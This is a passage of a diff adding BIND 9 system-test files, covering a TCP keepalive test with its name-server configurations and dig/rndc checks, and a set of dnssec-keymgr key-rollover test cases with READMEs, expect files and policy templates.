ns6/named.run +# Check that the SOA SERIAL increases and check the TTLs (should be changed +# from 300 to 400 as defined in ns6/example3.db.in). +retry_quiet 10 _check_soa_ttl 300 400 || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/keepalive/clean.sh b/bin/tests/system/keepalive/clean.sh new file mode 100644 index 0000000..9ccbd12 --- /dev/null +++ b/bin/tests/system/keepalive/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f output +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.conf +rm -f ns*/named.stats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/keepalive/expected b/bin/tests/system/keepalive/expected new file mode 100644 index 0000000..e498db7 --- /dev/null +++ b/bin/tests/system/keepalive/expected @@ -0,0 +1,4 @@ +tcp-initial-timeout=300 +tcp-idle-timeout=300 +tcp-keepalive-timeout=300 +tcp-advertised-timeout=200 diff --git a/bin/tests/system/keepalive/ns1/named.conf.in b/bin/tests/system/keepalive/ns1/named.conf.in new file mode 100644 index 0000000..26cf4b3 --- /dev/null +++ b/bin/tests/system/keepalive/ns1/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/keepalive/ns1/root.db b/bin/tests/system/keepalive/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/keepalive/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/keepalive/ns2/example.db b/bin/tests/system/keepalive/ns2/example.db new file mode 100644 index 0000000..ccc6ef9 --- /dev/null +++ b/bin/tests/system/keepalive/ns2/example.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA ns2 hostmaster.isc.org. 1 600 600 1200 600 +@ NS ns2 +ns2 A 10.53.0.2 +foo A 10.53.1.1 +bar A 10.53.2.2 diff --git a/bin/tests/system/keepalive/ns2/named.conf.in b/bin/tests/system/keepalive/ns2/named.conf.in new file mode 100644 index 0000000..6e308f4 --- /dev/null +++ b/bin/tests/system/keepalive/ns2/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + acache-enable yes; + send-cookie yes; + tcp-advertised-timeout 150; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/keepalive/ns3/named.conf.in b/bin/tests/system/keepalive/ns3/named.conf.in new file mode 100644 index 0000000..b6b8073 --- /dev/null +++ b/bin/tests/system/keepalive/ns3/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +server 10.53.0.2 { + tcp-only yes; + tcp-keepalive yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/keepalive/setup.sh b/bin/tests/system/keepalive/setup.sh new file mode 100644 index 0000000..57e0575 --- /dev/null +++ b/bin/tests/system/keepalive/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/keepalive/tests.sh b/bin/tests/system/keepalive/tests.sh new file mode 100644 index 0000000..7aea925 --- /dev/null +++ b/bin/tests/system/keepalive/tests.sh @@ -0,0 +1,98 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT}" + +n=0 +status=0 + +echo_i "checking that dig handles TCP keepalive ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +qr +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that dig added TCP keepalive ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD stats +grep "EDNS TCP keepalive option received" ns2/named.stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that TCP keepalive is added for TCP responses ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that TCP keepalive requires TCP ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default value ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.3 > dig.out.test$n +grep "; TCP KEEPALIVE: 30.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking configured value ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE: 15.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking re-configured value ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD tcp-timeouts 300 300 300 200 > output +$DIFF -b output expected || ret=1 +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE: 20.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking server config entry ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD stats +oka=`grep "EDNS TCP keepalive option received" ns2/named.stats | \ + tail -1 | awk '{ print $1}'` +$DIG $DIGOPTS bar.example @10.53.0.3 > dig.out.test$n +$RNDCCMD stats +nka=`grep "EDNS TCP keepalive option received" ns2/named.stats | \ + tail -1 | awk '{ print $1}'` +#echo oka ':' $oka +#echo nka ':' $nka +if [ "$oka" -eq "$nka" ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/keymgr/01-ksk-inactive/README b/bin/tests/system/keymgr/01-ksk-inactive/README new file mode 100644 index 0000000..a79314e --- /dev/null +++ b/bin/tests/system/keymgr/01-ksk-inactive/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. diff --git a/bin/tests/system/keymgr/01-ksk-inactive/expect b/bin/tests/system/keymgr/01-ksk-inactive/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/01-ksk-inactive/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/02-zsk-inactive/README b/bin/tests/system/keymgr/02-zsk-inactive/README new file mode 100644 index 0000000..8997e0a --- /dev/null +++ b/bin/tests/system/keymgr/02-zsk-inactive/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes one ZSK rollover. The first ZSK is deactivated +prior to its replacement being activated. diff --git a/bin/tests/system/keymgr/02-zsk-inactive/expect b/bin/tests/system/keymgr/02-zsk-inactive/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/02-zsk-inactive/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/03-ksk-unpublished/README b/bin/tests/system/keymgr/03-ksk-unpublished/README new file mode 100644 index 0000000..4086a31 --- /dev/null +++ b/bin/tests/system/keymgr/03-ksk-unpublished/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set contains one KSK rollover. The KSK is unpublished before its +successor is published. diff --git a/bin/tests/system/keymgr/03-ksk-unpublished/expect b/bin/tests/system/keymgr/03-ksk-unpublished/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/03-ksk-unpublished/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/04-zsk-unpublished/README b/bin/tests/system/keymgr/04-zsk-unpublished/README new file mode 100644 index 0000000..a3bbe85 --- /dev/null +++ b/bin/tests/system/keymgr/04-zsk-unpublished/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set contains one ZSK rollover. The ZSK is unpublished before its +successor is published. diff --git a/bin/tests/system/keymgr/04-zsk-unpublished/expect b/bin/tests/system/keymgr/04-zsk-unpublished/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/04-zsk-unpublished/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/05-ksk-unpub-active/README b/bin/tests/system/keymgr/05-ksk-unpub-active/README new file mode 100644 index 0000000..5b47456 --- /dev/null +++ b/bin/tests/system/keymgr/05-ksk-unpub-active/README @@ -0,0 +1,7 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes one KSK rollover. The first KSK is deleted +and its successor published prior to the first KSK being deactivated +and its successor activated. diff --git a/bin/tests/system/keymgr/05-ksk-unpub-active/expect b/bin/tests/system/keymgr/05-ksk-unpub-active/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/05-ksk-unpub-active/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/06-zsk-unpub-active/README b/bin/tests/system/keymgr/06-zsk-unpub-active/README new file mode 100644 index 0000000..5b47456 --- /dev/null +++ b/bin/tests/system/keymgr/06-zsk-unpub-active/README @@ -0,0 +1,7 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes one KSK rollover. The first KSK is deleted +and its successor published prior to the first KSK being deactivated +and its successor activated. diff --git a/bin/tests/system/keymgr/06-zsk-unpub-active/expect b/bin/tests/system/keymgr/06-zsk-unpub-active/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/06-zsk-unpub-active/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 2h example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/07-ksk-ttl/README b/bin/tests/system/keymgr/07-ksk-ttl/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/07-ksk-ttl/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/07-ksk-ttl/expect b/bin/tests/system/keymgr/07-ksk-ttl/expect new file mode 100644 index 0000000..03d719c --- /dev/null +++ b/bin/tests/system/keymgr/07-ksk-ttl/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/08-zsk-ttl/README b/bin/tests/system/keymgr/08-zsk-ttl/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/08-zsk-ttl/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/08-zsk-ttl/expect b/bin/tests/system/keymgr/08-zsk-ttl/expect new file mode 100644 index 0000000..03d719c --- /dev/null +++ b/bin/tests/system/keymgr/08-zsk-ttl/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/09-no-keys/README b/bin/tests/system/keymgr/09-no-keys/README new file mode 100644 index 0000000..7de6d40 --- /dev/null +++ b/bin/tests/system/keymgr/09-no-keys/README @@ -0,0 +1,5 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This directory has no key set, but one will be initialized by dnssec-keymgr. diff --git a/bin/tests/system/keymgr/09-no-keys/expect b/bin/tests/system/keymgr/09-no-keys/expect new file mode 100644 index 0000000..03d719c --- /dev/null +++ b/bin/tests/system/keymgr/09-no-keys/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/10-change-roll/README b/bin/tests/system/keymgr/10-change-roll/README new file mode 100644 index 0000000..c83de5f --- /dev/null +++ b/bin/tests/system/keymgr/10-change-roll/README @@ -0,0 +1,7 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This directory has a key set which is valid, but has a ZSK rollover period +of only three months. It will be updated to have a ZSK rollover period of +one year. diff --git a/bin/tests/system/keymgr/10-change-roll/expect b/bin/tests/system/keymgr/10-change-roll/expect new file mode 100644 index 0000000..03d719c --- /dev/null +++ b/bin/tests/system/keymgr/10-change-roll/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/11-many-simul/README b/bin/tests/system/keymgr/11-many-simul/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/11-many-simul/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/11-many-simul/expect b/bin/tests/system/keymgr/11-many-simul/expect new file mode 100644 index 0000000..03d719c --- /dev/null +++ b/bin/tests/system/keymgr/11-many-simul/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/12-many-active/README b/bin/tests/system/keymgr/12-many-active/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/12-many-active/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/12-many-active/expect b/bin/tests/system/keymgr/12-many-active/expect new file mode 100644 index 0000000..67fc4e9 --- /dev/null +++ b/bin/tests/system/keymgr/12-many-active/expect @@ -0,0 +1,9 @@ +kargs="-f example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/13-noroll/README b/bin/tests/system/keymgr/13-noroll/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/13-noroll/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/13-noroll/expect b/bin/tests/system/keymgr/13-noroll/expect new file mode 100644 index 0000000..67fc4e9 --- /dev/null +++ b/bin/tests/system/keymgr/13-noroll/expect @@ -0,0 +1,9 @@ +kargs="-f example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/14-wrongalg/README b/bin/tests/system/keymgr/14-wrongalg/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/14-wrongalg/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/14-wrongalg/expect b/bin/tests/system/keymgr/14-wrongalg/expect new file mode 100644 index 0000000..bd5eadb --- /dev/null +++ b/bin/tests/system/keymgr/14-wrongalg/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=4 diff --git a/bin/tests/system/keymgr/15-unspec/README b/bin/tests/system/keymgr/15-unspec/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/15-unspec/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/15-unspec/expect b/bin/tests/system/keymgr/15-unspec/expect new file mode 100644 index 0000000..ad300c4 --- /dev/null +++ b/bin/tests/system/keymgr/15-unspec/expect @@ -0,0 +1,9 @@ +kargs="" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/16-wrongalg-unspec/README b/bin/tests/system/keymgr/16-wrongalg-unspec/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/16-wrongalg-unspec/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/16-wrongalg-unspec/expect b/bin/tests/system/keymgr/16-wrongalg-unspec/expect new file mode 100644 index 0000000..c836535 --- /dev/null +++ b/bin/tests/system/keymgr/16-wrongalg-unspec/expect @@ -0,0 +1,9 @@ +kargs="" +kmatch="" +kret=0 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=4 diff --git a/bin/tests/system/keymgr/17-noforce/README b/bin/tests/system/keymgr/17-noforce/README new file mode 100644 index 0000000..0830ca3 --- /dev/null +++ b/bin/tests/system/keymgr/17-noforce/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes a KSK rollover, with insufficient delay between +prepublication and rollover. diff --git a/bin/tests/system/keymgr/17-noforce/expect b/bin/tests/system/keymgr/17-noforce/expect new file mode 100644 index 0000000..029a4e9 --- /dev/null +++ b/bin/tests/system/keymgr/17-noforce/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=1 +cargs="-d 1w -m 2w example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/README b/bin/tests/system/keymgr/18-nonstd-prepub/README new file mode 100644 index 0000000..4ee0a8a --- /dev/null +++ b/bin/tests/system/keymgr/18-nonstd-prepub/README @@ -0,0 +1,7 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This directory has a key set which is valid, but will expire within +the rollover period. The prepublication interval in policy.conf is a +nonstandard value. diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/expect b/bin/tests/system/keymgr/18-nonstd-prepub/expect new file mode 100644 index 0000000..e8518d8 --- /dev/null +++ b/bin/tests/system/keymgr/18-nonstd-prepub/expect @@ -0,0 +1,9 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 1d example.com" +cmatch="" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in b/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in new file mode 100644 index 0000000..757311a --- /dev/null +++ b/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +policy default { + policy global; + algorithm @DEFAULT_ALGORITHM@; + pre-publish zsk 2w; + roll-period zsk 6mo; + coverage 364d; +}; diff --git a/bin/tests/system/keymgr/19-old-keys/README b/bin/tests/system/keymgr/19-old-keys/README new file mode 100644 index 0000000..bd66ba8 --- /dev/null +++ b/bin/tests/system/keymgr/19-old-keys/README @@ -0,0 +1,7 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This directory has a key set which is valid, but which was published +and activated more than one rollover period ago. dnssec-keymgr should +not mark the keys as already being inactive and deleted. diff --git a/bin/tests/system/keymgr/19-old-keys/expect b/bin/tests/system/keymgr/19-old-keys/expect new file mode 100644 index 0000000..ad73b53 --- /dev/null +++ b/bin/tests/system/keymgr/19-old-keys/expect @@ -0,0 +1,12 @@ +kargs="example.com" +kmatch="" +kret=0 +cargs="-d 1h -m 1w example.com" +cmatch="4,Publish +4,Activate +2,Inactive +2,Delete" +cret=0 +warn=0 +error=0 +ok=2 diff --git a/bin/tests/system/keymgr/19-old-keys/extra.sh b/bin/tests/system/keymgr/19-old-keys/extra.sh new file mode 100644 index 0000000..502d951 --- /dev/null +++ b/bin/tests/system/keymgr/19-old-keys/extra.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +now=`$PERL -e 'print time()."\n";'` +for keyfile in K*.key; do + inactive=`$SETTIME -upI $keyfile | awk '{print $2}'` + if [ "$inactive" = UNSET ]; then + continue + elif [ "$inactive" -lt "$now" ]; then + echo_d "inactive date is in the past" + ret=1 + fi +done diff --git a/bin/tests/system/keymgr/19-old-keys/policy.conf.in b/bin/tests/system/keymgr/19-old-keys/policy.conf.in new file mode 100644 index 0000000..757311a --- /dev/null +++ b/bin/tests/system/keymgr/19-old-keys/policy.conf.in @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +policy default { + policy global; + algorithm @DEFAULT_ALGORITHM@; + pre-publish zsk 2w; + roll-period zsk 6mo; + coverage 364d; +}; diff --git a/bin/tests/system/keymgr/clean.sh b/bin/tests/system/keymgr/clean.sh new file mode 100644 index 0000000..d8cad32 --- /dev/null +++ b/bin/tests/system/keymgr/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at 